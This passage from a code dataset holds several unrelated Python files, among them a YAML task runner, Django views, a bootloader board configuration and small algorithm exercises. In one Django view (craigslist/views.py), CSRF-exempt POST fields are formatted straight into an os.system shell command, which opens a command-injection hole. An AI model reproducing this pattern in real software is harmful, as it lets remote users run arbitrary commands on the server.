int(stimulus.shape[0] / n)\n click = np.append(click, np.zeros(trial_length - 20))\n click = np.tile(click,30)\n stimulus = np.append(silence, stimulus)\n click = np.append(silence, click)\n stimulus = np.array([stimulus, click], np.float32)\n stimulus = stimulus.conj().T\n write('output/' + i + '_' + str(j+1) + '.wav', Fs, stimulus)\n f = open('output/' + i + '_' + str(j+1) + \".json\", \"w\")\n f.write(json)\n f.close()\n \n # write one-band only training\n stimulus, json = generate_stimulus(target_band=i, distractor_volume=0)\n stimulus = np.asarray(stimulus, dtype='float32')\n stimulus = np.append(silence, stimulus)\n write('output/' + i + '_training_1' + '.wav', Fs, stimulus)\n f = open('output/' + i + '_training_1' + \".json\", \"w\")\n f.write(json)\n f.close()\n\n # write half-volume training\n stimulus, json = generate_stimulus(target_band=i, distractor_volume=0.5)\n stimulus = np.asarray(stimulus, dtype='float32')\n stimulus = np.append(silence, stimulus)\n write('output/' + i + '_training_2' + '.wav', Fs, stimulus)\n f = open('output/' + i + '_training_2' + \".json\", \"w\")\n f.write(json)\n f.close()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"439186084","text":"import os\nimport yaml\n\n\n\nclass Dog:\n def __init__(self, command, list, file, verbose):\n self.file = file\n self.verbose = verbose\n self.list = list\n\n if self.file not in os.listdir():\n print(f\"Couldn't find '{self.file}' in current working directory\")\n 
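# stop here: the rest of __init__ needs the dog file to exist\n            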
exit(1)\n\n self.info: dict = {}\n with open(self.file, 'r') as f:\n self.info: dict = yaml.load(f, Loader=yaml.FullLoader)\n\n if 'commands' not in self.info:\n print(f\"Please supply commands in the '{self.file}' dog file\")\n exit(1)\n\n if self.list:\n self.show_list()\n exit(0)\n\n self.run_command(command)\n \n def show_list(self):\n print(\"List of available commands:\\n\")\n for cmd in self.info['commands']:\n print(f\" {cmd}\")\n if 'description' in self.info['commands'][cmd]:\n print(f\" {self.info['commands'][cmd]['description']}\")\n \n print()\n print(\"usage: ``dog COMMAND``\")\n\n def run_command(self, command):\n if self.verbose: print(f\"Running DOG command: {command}\")\n\n if command not in self.info['commands']:\n print(f\"Command '{command}' not found in dog file: '{self.file}'\")\n print(\"For a list of commands run ``dog --list`` \")\n exit(1)\n\n code = [line.strip() for line in str(self.info['commands'][command]['code']).split(\";\")]\n\n while \"\" in code:\n code.remove(\"\")\n\n for line in code:\n if self.verbose:\n print()\n print(\"$ \" + line.replace('\\n', '\\\\n'))\n os.system(line)\n","sub_path":"dogmodule/dog.py","file_name":"dog.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223866554","text":"# from django.shortcuts import render\r\n# from scrapy_app import emails\r\n# import os\r\n# from craigslist.utils import start_urls_maker\r\n#\r\n# def index(request):\r\n# \treturn render(request, \"home.html\")\r\n#\r\n# def action(request):\r\n# \tmodel = request.POST.get(\"model\")\r\n# \temail = request.POST.get(\"email\")\r\n# \tmini = request.POST.get(\"min\")\r\n# \tmaxi = request.POST.get(\"max\")\r\n# \turls = start_urls_maker(model)\r\n# \t# os.system(\"cd.. & cd scrappy_app & dir\")\r\n# \tos.system(\"cd scrapy_app & rm ./cars.csv & scrapy crawl cars -o cars.csv -t csv -a mini={0} -a maxi={1} -a model={2}\".format(mini, maxi, model))\r\n# \tos.system(\"cd scrapy_app & python ./emails.py %s\" % email)\r\n# \treturn render(request, \"success.html\")\r\n\r\n\r\nfrom django.shortcuts import render\r\nimport os\r\nfrom craigslist.utils import start_urls_maker\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\n\r\n@csrf_exempt\r\ndef index(request):\r\n\treturn render(request, \"home.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef action(request):\r\n\tip = request.META.get('REMOTE_ADDR')\r\n\tmodel = request.POST.get(\"model\")\r\n\tmini = request.POST.get(\"min\")\r\n\tmaxi = request.POST.get(\"max\")\r\n\r\n\t# os.system(\"cd.. & cd scrappy_app & dir\")\r\n\t# print(os.system(\"pwd\"))\r\n\r\n\tos.system(\r\n\t\t\"cd scrapy_app & del cars.csv & scrapy crawl cars -o cars.csv -t csv -a q={0} -a mini={1} -a maxi={2}\".format(model, mini, maxi))\r\n\r\n\t# os.system(\"cd. 
& cd scrapy_app & dir\")\r\n\t# with open(\"cars.csv\", \"r\") as file:\r\n\t# \tlines = file.readlines()\r\n\t# \tprint(lines)\r\n\t# os.system(\"cd scrapy_app & python emails.py %s\" % email)\r\n\treturn render(request, \"success.html\")\r\n","sub_path":"craigslist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"77968265","text":"from django.shortcuts import render, render_to_response, HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth import login, authenticate\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\n\nfrom .models import GithubUser\n\nimport requests\nimport json\n\ndef home(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect(reverse('profile'))\n else:\n return render_to_response('home.html', context=RequestContext(request, {'client_id':settings.CLIENT_ID}))\n\ndef github_oauth(request):\n \"\"\"\n Method which authenticate a user using github and creates a django user\n \"\"\"\n token = request.GET.get('code')\n github_user = GithubUser()\n access_token = github_user.get_access_token(token)\n if access_token:\n try:\n data = github_user.get_user_details(access_token)\n email = data.get('email')\n user = GithubUser.objects.get(email=email)\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n except ObjectDoesNotExist:\n email = data.get('email')\n first_name = data.get('name')\n avatar_url = data.get('avatar_url')\n profile_url = data.get('html_url')\n username = data.get('login')\n user = GithubUser.objects.create_user(email=email, username=username, first_name=first_name, avatar_url=avatar_url,\n profile_url=profile_url, access_token=access_token)\n user.save()\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n return HttpResponseRedirect(reverse('profile'))\n\n@login_required(login_url='/')\ndef profile(request):\n \"\"\"\n View which shows user profile and allows user to create repository\n \"\"\"\n return render_to_response('profile.html', context=RequestContext(request, {}))\n\n@login_required\ndef create_repo(request):\n \"\"\"\n Service which creates a Github repo\n \"\"\"\n repo_name = request.POST.get('repo_name')\n repo_description = request.POST.get('repo_description')\n repo_type = request.POST.get('repo_type')\n github_user = GithubUser()\n repo = github_user.create_github_repo(repo_name, repo_description, repo_type, request.user)\n if repo == True:\n return HttpResponse(json.dumps({\"result\":\"success\", \"message\":\"success\"}))\n else:\n return HttpResponse(json.dumps({\"result\":\"fail\", \"message\":repo}))\n\n@login_required\ndef logout_view(request):\n \"\"\"\n Logouts current user\n \"\"\"\n logout(request)\n return HttpResponseRedirect(reverse('home'))\n\n","sub_path":"github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"631385804","text":"class Solution:\n \n def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:\n pacific, atlantic = set(), set()\n m, n = len(heights), len(heights[0])\n for i in range(m):\n self.dfs(heights, i, 0, 0, pacific)\n 
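# cells on column n-1 touch the Atlantic; flood inland from the right edge of this row\n            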
self.dfs(heights, i, n - 1, 0, atlantic)\n for j in range(n):\n self.dfs(heights, 0, j, 0, pacific)\n self.dfs(heights, m - 1, j, 0, atlantic)\n return list(map(list, list(pacific & atlantic)))\n \n \n def dfs(self, heights, x, y, height, visited):\n m, n = len(heights), len(heights[0])\n if x < 0 or y < 0 or x >= m or y >= n or (x, y) in visited:\n return\n if heights[x][y] < height:\n return\n visited.add((x, y))\n for a, b in [[x - 1, y], [x, y - 1], [x + 1, y], [x, y + 1]]:\n self.dfs(heights, a, b, heights[x][y], visited)\n\n","sub_path":"417_pacific_atlantic_water_flow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224612176","text":"'''\nInput: a List of integers\nReturns: a List of integers\n'''\ndef moving_zeroes(arr):\n # Declare two working lists (arrays)\n wrk_arr1 = []\n wrk_arr2 = []\n\n # Iterate through the array\n for elm in arr:\n if elm != 0:\n wrk_arr1.append(elm)\n else:\n wrk_arr2.append(elm)\n\n # Return a list of nonzero and zero elements (in that order)\n return [*wrk_arr1, *wrk_arr2]\n\n\nif __name__ == '__main__':\n # Use the main function here to test out your implementation\n arr = [0, 3, 1, 0, -2]\n\n print(f\"The resulting of moving_zeroes is: {moving_zeroes(arr)}\")","sub_path":"moving_zeroes/moving_zeroes.py","file_name":"moving_zeroes.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562475250","text":"from __future__ import print_function\n\nimport os, sys, glob\n\nCLEAR_LINE = '\\x1b[2K'\nSTART_LINE = '\\x1B[0E'\n\ndef status_bar(n, n_max):\n n_jump = max(1,int(n_max/100))\n assert n<=n_max, 'n must be less than or equal to n_max'\n if (n==n_max):\n print('\\r>> 100 %')\n elif (n%n_jump==0):\n print('\\r>> {:3d} %'.format(int(round(100.0*n/n_max,0))), end='')\n sys.stdout.flush()\n\ndef status_bar_2(n, n_max, width=50):\n assert n<=n_max, 'n must be less than or equal to n_max'\n if (n==n_max):\n print('\\r>> 100 % [{}]'.format('='*width))\n return\n # Get a spacing so that at most 100 updates are performed\n n_jump = max(1,int(n_max/100.0))\n # Check if we're on this spacing\n if (n%n_jump==0):\n frac = (1.0*n)/n_max\n num_bars = int(width*frac)\n bars = '='*num_bars\n blanks = ' '*(width-num_bars-1)\n perc = int(100.0*frac)\n print('\\r>> {:3d} % [{}>{}]'.format(perc, bars, blanks), end='')\n sys.stdout.flush()\n\n","sub_path":"bamboo/common/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157421845","text":"import logging\n\nfrom pywintypes import error as Win32Error\nfrom win32api import OpenProcess\nfrom win32file import CloseHandle\nfrom win32event import SYNCHRONIZE\n\nfrom .base import ProgramBase\n\n\nlog = logging.getLogger(__name__)\n\nclass NTProgram(ProgramBase):\n\n\n @property\n def is_running(self):\n\n pid = self.state.get('pid')\n if not pid:\n return False\n\n try:\n handle = OpenProcess(SYNCHRONIZE, 0, pid)\n return True\n except Win32Error:\n return False\n finally:\n CloseHandle(handle)\n\n","sub_path":"chalmers/program/nt.py","file_name":"nt.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633226075","text":"import numpy as np\nfrom keras.datasets import mnist\n\n(x_train, 
y_train), (x_test, y_test) = mnist.load_data()\nX_train = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])\nX_train=X_train/255\n#X_train = np.array(X_train).T\nY_train = (np.arange(10)==y_train[:, None]).astype(int)\n#Y_train = np.array(Y_train).T\n \nX_test = x_test.reshape(x_test.shape[0], x_test.shape[1] * x_test.shape[2])\nX_test=X_test/255\n#X_test = np.array(X_test).T\nY_test = (np.arange(10) == y_test[:, None]).astype(int)\n#Y_test = np.array(Y_test).T\n \n\n\n# stack together for next step (use the flattened, scaled splits; labels are 1-D, so hstack)\nX = np.vstack((X_train, X_test))\ny = np.hstack((y_train, y_test))\n\n\n# one-hot encoding\ndigits = 10\nexamples = y.shape[0]\ny = y.reshape(1, examples)\nY_new = np.eye(digits)[y.astype('int32')]\nY_new = Y_new.T.reshape(digits, examples)\n\n\n# number of training set\nm = 60000\nm_test = X.shape[0] - m\nX_train, X_test = X[:m].T, X[m:].T\nY_train, Y_test = Y_new[:, :m], Y_new[:, m:]\n\n\n# shuffle training set\nshuffle_index = np.random.permutation(m)\nX_train, Y_train = X_train[:, shuffle_index], Y_train[:, shuffle_index]","sub_path":".history/yjs/numpy_20210606172826.py","file_name":"numpy_20210606172826.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"323668125","text":"## @file\r\n# This file is used to provide board specific image information.\r\n#\r\n# Copyright (c) 2017-2019, Intel Corporation. All rights reserved.<BR>
\r\n#\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nimport os\r\nimport sys\r\nimport shutil\r\nimport time\r\n\r\nsys.dont_write_bytecode = True\r\nsys.path.append (os.path.join('..', '..'))\r\nfrom BuildLoader import BaseBoard, STITCH_OPS, FLASH_REGION_TYPE\r\n\r\nclass Board(BaseBoard):\r\n def __init__(self, *args, **kwargs):\r\n\r\n super(Board, self).__init__(*args, **kwargs)\r\n\r\n self.VERINFO_IMAGE_ID = 'SB_CFL'\r\n self.VERINFO_PROJ_MAJOR_VER = 1\r\n self.VERINFO_PROJ_MINOR_VER = 1\r\n self.VERINFO_SVN = 1\r\n self.VERINFO_BUILD_DATE = time.strftime(\"%m/%d/%Y\")\r\n self.LOWEST_SUPPORTED_FW_VER = ((self.VERINFO_PROJ_MAJOR_VER << 8) + self.VERINFO_PROJ_MINOR_VER)\r\n\r\n self.BOARD_NAME = 'cfl'\r\n self.BOARD_PKG_NAME = 'CoffeelakeBoardPkg'\r\n self.SILICON_PKG_NAME = 'CoffeelakePkg'\r\n\r\n self.PCI_EXPRESS_BASE = 0xE0000000\r\n self.PCI_IO_BASE = 0x00003000\r\n self.PCI_MEM32_BASE = 0x9F000000\r\n self.ACPI_PM_TIMER_BASE = 0x1808\r\n\r\n self.FLASH_BASE_ADDRESS = 0xFE000000\r\n self.FLASH_BASE_SIZE = (self.FLASH_LAYOUT_START - self.FLASH_BASE_ADDRESS)\r\n\r\n self.HAVE_FIT_TABLE = 1\r\n self.HAVE_VBT_BIN = 1\r\n self.HAVE_VERIFIED_BOOT = 1\r\n self.HAVE_MEASURED_BOOT = 1\r\n self.HAVE_ACPI_TABLE = 1\r\n self.ENABLE_SPLASH = 1\r\n self.ENABLE_FRAMEBUFFER_INIT = 1\r\n self.HAVE_PSD_TABLE = 1\r\n self.ENABLE_GRUB_CONFIG = 1\r\n self.ENABLE_CSME_UPDATE = 0\r\n self.ENABLE_DMA_PROTECTION = 0\r\n self.DEBUG_PORT_NUMBER = 0xFF\r\n\r\n # CSME update library is required to enable this option and will be available as part of CSME kit\r\n self.BUILD_CSME_UPDATE_DRIVER = 0\r\n\r\n # To enable source debug, set 1 to self.ENABLE_SOURCE_DEBUG\r\n self.ENABLE_SOURCE_DEBUG = 0\r\n # If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored\r\n self.SKIP_STAGE1A_SOURCE_DEBUG = 0\r\n\r\n if self.HAVE_FIT_TABLE:\r\n self.FIT_ENTRY_MAX_NUM = 12\r\n\r\n self.STAGE1A_SIZE = 0x00010000\r\n self.STAGE1B_SIZE = 0x000DB000\r\n self.STAGE2_SIZE = 0x00080000\r\n if self.ENABLE_SOURCE_DEBUG:\r\n self.STAGE1B_SIZE += 0x4000\r\n\r\n self.ENABLE_FWU = 1\r\n self.ENABLE_SMBIOS = 1\r\n\r\n # Verify required minimum FSP version\r\n self.MIN_FSP_REVISION = 0x07006550\r\n # Verify FSP image ID. 
Empty string means skipping verification\r\n self.FSP_IMAGE_ID = '$CFLFSP$'\r\n\r\n self.STAGE1B_XIP = 1\r\n\r\n # Stack settings to run FspMemoryInit\r\n self.FSP_M_STACK_TOP = 0xFEF3FF00\r\n\r\n self.STAGE2_FD_BASE = 0x01000000\r\n self.STAGE2_FD_SIZE = 0x000E0000\r\n\r\n self.STAGE1_STACK_SIZE = 0x00002000\r\n self.STAGE1_DATA_SIZE = 0x00014000\r\n\r\n self.PAYLOAD_EXE_BASE = 0x00B00000\r\n self.PAYLOAD_SIZE = 0x00028000\r\n if len(self._PAYLOAD_NAME.split(';')) > 1:\r\n self.UEFI_VARIABLE_SIZE = 0x00040000\r\n else:\r\n self.UEFI_VARIABLE_SIZE = 0x1000\r\n self.EPAYLOAD_SIZE = 0x00190000\r\n self.UCODE_SIZE = 0x00080000\r\n self.MRCDATA_SIZE = 0x00008000\r\n self.CFGDATA_SIZE = 0x00004000\r\n self.KEYHASH_SIZE = 0x00001000\r\n self.VARIABLE_SIZE = 0x00002000\r\n self.SBLRSVD_SIZE = 0x00001000\r\n self.FWUPDATE_SIZE = 0x00020000 if self.ENABLE_FWU else 0\r\n\r\n self.TOP_SWAP_SIZE = 0x020000\r\n self.REDUNDANT_SIZE = self.UCODE_SIZE + self.STAGE2_SIZE + self.STAGE1B_SIZE + \\\r\n self.FWUPDATE_SIZE + self.CFGDATA_SIZE + self.KEYHASH_SIZE\r\n self.NON_REDUNDANT_SIZE = 0x3BF000\r\n self.NON_VOLATILE_SIZE = 0x001000\r\n self.SLIMBOOTLOADER_SIZE = (self.TOP_SWAP_SIZE + self.REDUNDANT_SIZE) * 2 + \\\r\n self.NON_REDUNDANT_SIZE + self.NON_VOLATILE_SIZE\r\n\r\n self.PLD_HEAP_SIZE = 0x04000000\r\n self.PLD_STACK_SIZE = 0x00020000\r\n self.PLD_RSVD_MEM_SIZE = 0x00500000\r\n\r\n # TBD: ACM/KM/BPM Size, as of Sep 2017\r\n # ACM size is fixed 100KB, KM size is fixed 0x400, BPM size is fixed 0x600\r\n self.KM_SIZE = 0x00000400\r\n self.BPM_SIZE = 0x00000600\r\n self.ACM_SIZE = 0x00008000 + self.KM_SIZE + self.BPM_SIZE\r\n # adjust ACM_SIZE to meet 128KB alignment (to align 100KB ACM size)\r\n if self.ACM_SIZE > 0:\r\n acm_top = self.FLASH_LAYOUT_START - self.STAGE1A_SIZE\r\n acm_btm = acm_top - self.ACM_SIZE\r\n acm_btm = (acm_btm & 0xFFFE0000)\r\n self.ACM_SIZE = acm_top - acm_btm\r\n\r\n self.CFGDATA_REGION_TYPE = FLASH_REGION_TYPE.BIOS\r\n self.SPI_IAS_REGION_TYPE = FLASH_REGION_TYPE.BIOS\r\n\r\n self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE + 0x4000\r\n self._CFGDATA_INT_FILE = ['CfgDataInt_Cfls.dlt', 'CfgDataInt_Cflh.dlt', 'CfgDataInt_Whl.dlt']\r\n self._CFGDATA_EXT_FILE = ['CfgDataExt_Upx.dlt']\r\n\r\n def GetPlatformDsc (self):\r\n dsc = {}\r\n common_libs = [\r\n 'LoaderLib|Platform/CommonBoardPkg/Library/LoaderLib/LoaderLib.inf',\r\n 'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',\r\n 'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',\r\n 'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',\r\n 'PchSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/PchSbiAccessLib/PchSbiAccessLib.inf',\r\n 'PchInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/PchInfoLib/PchInfoLib.inf',\r\n 'PchSerialIoLib|Silicon/$(SILICON_PKG_NAME)/Library/PchSerialIoLib/PchSerialIoLib.inf',\r\n 'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',\r\n 'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',\r\n 'BdatLib|Silicon/$(SILICON_PKG_NAME)/Library/BdatLib/BdatLib.inf',\r\n 'BootMediaLib|Silicon/$(SILICON_PKG_NAME)/Library/BootMediaLib/BootMediaLib.inf',\r\n 'StageCommonLib|Silicon/$(SILICON_PKG_NAME)/Library/StageCommonLib/StageCommonLib.inf',\r\n 'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib/BootGuardLib.inf',\r\n 'SgxLib|Silicon/$(SILICON_PKG_NAME)/Library/SgxLib/SgxLib.inf',\r\n 'PsdLib|Silicon/$(SILICON_PKG_NAME)/Library/PsdLib/PsdLib.inf',\r\n 
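# HECI access library used to talk to the CSME firmware\r\n            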
'HeciLib|Silicon/$(SILICON_PKG_NAME)/Library/HeciLib/HeciLib.inf',\r\n 'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',\r\n 'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf'\r\n ]\r\n if self.BUILD_CSME_UPDATE_DRIVER:\r\n common_libs.append ('MeFwUpdateLib|Silicon/$(SILICON_PKG_NAME)/Library/MeFwUpdateLib/MeFwUpdateLib.inf')\r\n dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs\r\n return dsc\r\n\r\n def GetKeyHashList (self):\r\n # Define a set of new key used for different purposes\r\n # The key is either key id or public key PEM format or private key PEM format\r\n pub_key_list = [\r\n (\r\n # Key for verifying Config data blob\r\n HASH_USAGE['PUBKEY_CFG_DATA'],\r\n 'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # Key for verifying firmware update\r\n HASH_USAGE['PUBKEY_FWU'],\r\n 'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # Key for verifying container header\r\n HASH_USAGE['PUBKEY_CONT_DEF'],\r\n 'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n (\r\n # key for veryfying OS image.\r\n HASH_USAGE['PUBKEY_OS'],\r\n 'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE\r\n ),\r\n ]\r\n return pub_key_list\r\n\r\n def GetImageLayout (self):\r\n img_list = []\r\n\r\n acm_flag = 0 if self.ACM_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR\r\n fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR\r\n cfg_flag = 0 if len(self._CFGDATA_EXT_FILE) > 0 and self.CFGDATA_REGION_TYPE == FLASH_REGION_TYPE.BIOS else STITCH_OPS.MODE_FILE_IGNOR\r\n\r\n # output files need to have unique base name (excluding file extension)\r\n # output files ends with 'rom' extension will be copied over for final stitching\r\n img_list.extend ([\r\n ('NON_VOLATILE.bin', [\r\n ('SBLRSVD.bin', '' , self.SBLRSVD_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('NON_REDUNDANT.bin', [\r\n ('VARIABLE.bin' , '' , self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('MRCDATA.bin' , '' , self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('EPAYLOAD.bin', '' , self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('UEFIVARIABLE.bin', '' , self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ('PAYLOAD.bin' , 'Lz4' , self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('REDUNDANT_A.bin', [\r\n ('UCODE.bin' , '' , self.UCODE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE2.fd' , 'Lz4' , self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('FWUPDATE.bin' , 'Lzma' , self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('CFGDATA.bin' , '' , self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD | cfg_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('KEYHASH.bin' , '' , self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1B_A.fd' , '' , self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('REDUNDANT_B.bin', [\r\n ('UCODE.bin' , '' , self.UCODE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE2.fd' , 'Lz4' , self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('FWUPDATE.bin' , 'Lzma' , self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('CFGDATA.bin' , '' , self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD | cfg_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('KEYHASH.bin' 
, '' , self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1B_B.fd' , '' , self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('TOP_SWAP_A.bin', [\r\n ('ACM.bin' , '' , self.ACM_SIZE, STITCH_OPS.MODE_FILE_NOP | acm_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1A_A.fd' , '' , self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('TOP_SWAP_B.bin', [\r\n ('ACM.bin' , '' , self.ACM_SIZE, STITCH_OPS.MODE_FILE_NOP | acm_flag, STITCH_OPS.MODE_POS_TAIL),\r\n ('STAGE1A_B.fd' , '' , self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL),\r\n ]\r\n ),\r\n ('SlimBootloader.bin', [\r\n ('NON_VOLATILE.bin' , '' , self.NON_VOLATILE_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('NON_REDUNDANT.bin' , '' , self.NON_REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('REDUNDANT_B.bin' , '' , self.REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('REDUNDANT_A.bin' , '' , self.REDUNDANT_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('TOP_SWAP_B.bin' , '' , self.TOP_SWAP_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ('TOP_SWAP_A.bin' , '' , self.TOP_SWAP_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_HEAD),\r\n ]\r\n ),\r\n ])\r\n\r\n return img_list\r\n","sub_path":"Platform/CoffeelakeBoardPkg/BoardConfig.py","file_name":"BoardConfig.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"483221147","text":"from odoo import api, fields, models\nfrom odoo.tools.translate import _\n\n\nclass ProjectProject(models.Model):\n _inherit = 'project.project'\n\n event_number = fields.Integer(compute='_compute_event_number',\n string='Number of Meetings')\n\n label_tasks = fields.Char(translate=True,\n default=lambda self: _(\"Tasks\"),\n help=\"Gives label to tasks on project's kanban \"\n \"view.\")\n\n label_issues = fields.Char(translate=True,\n default=lambda self: _(\"Issues\"))\n\n def _compute_task_count(self):\n for partner in self:\n part = partner.task_ids.filtered(\n lambda r: r.state not in ['done', 'cancelled'])\n partner.task_count = len(part)\n\n @api.multi\n def _compute_event_number(self):\n for record in self:\n cal_events = record.calendar_event_ids.filtered(\n lambda r: r.event_state == 'open')\n record.event_number = len(cal_events)\n\n @api.multi\n def action_make_meeting(self):\n \"\"\" This opens Meeting's calendar view to schedule meeting on\n current applicant\n @return: Dictionary value for created Meeting view\n \"\"\"\n self.ensure_one()\n\n task_owner_id = self.env['res.users'].browse(self.env.uid)\n partners = task_owner_id.partner_id | self.user_id.partner_id\n\n category = self.env.ref('calendar.categ_meet1')\n\n res = self.env['ir.actions.act_window'].for_xml_id(\n 'calendar', 'action_calendar_event')\n\n res['context'] = {\n 'search_default_partner_ids': task_owner_id.name,\n 'search_default_project_id': self.id,\n 'default_partner_id': self.partner_id.id,\n 'default_partner_ids': partners.ids,\n 'default_user_id': self.env.uid,\n 'default_name': self.name,\n 'default_project_id': self.id,\n 'default_categ_ids': category and [category.id] or False,\n }\n\n return 
